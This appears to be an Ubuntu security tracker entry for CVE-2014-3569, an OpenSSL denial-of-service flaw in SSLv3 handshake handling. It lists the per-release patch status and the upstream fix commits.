CVE-2014-3569

Priority
Description
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc,
1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported
protocols, which allows remote attackers to cause a denial of service (NULL
pointer dereference and daemon crash) via an unexpected handshake, as
demonstrated by an SSLv3 handshake to a no-ssl3 application with certain
error handling. NOTE: this issue became relevant after the CVE-2014-3568
fix.
Assigned-to
mdeslaur
Notes
mdeslaurUbuntu packages aren't compiled with no-ssl3, so aren't actually
vulnerable to this issue.
Package
Upstream:released (0.9.8zd, 1.0.1k)
Ubuntu 12.04 ESM (Precise Pangolin):released (1.0.1-4ubuntu5.21)
Ubuntu 14.04 ESM (Trusty Tahr):released (1.0.1f-1ubuntu2.8)
Ubuntu 16.04 LTS (Xenial Xerus):released (1.0.1f-1ubuntu10)
Ubuntu 18.04 LTS (Bionic Beaver):released (1.0.1f-1ubuntu10)
Patches:
Upstream:https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=6ce9687b5aba5391fc0de50e18779eb676d0e04d (1.0.1)
Upstream:https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=b82924741b4bd590da890619be671f4635e46c2b (0.9.8)
Package
Upstream:released (0.9.8o-4squeeze18)
Ubuntu 12.04 ESM (Precise Pangolin):DNE (precise was needed)
Ubuntu 14.04 ESM (Trusty Tahr):DNE (trusty was needed)
Ubuntu 16.04 LTS (Xenial Xerus):DNE
Ubuntu 18.04 LTS (Bionic Beaver):DNE
More Information

Updated: 2020-07-28 19:52:06 UTC (commit d26b6ca9f5b3adb89bb036ce73ae7dab894935ec)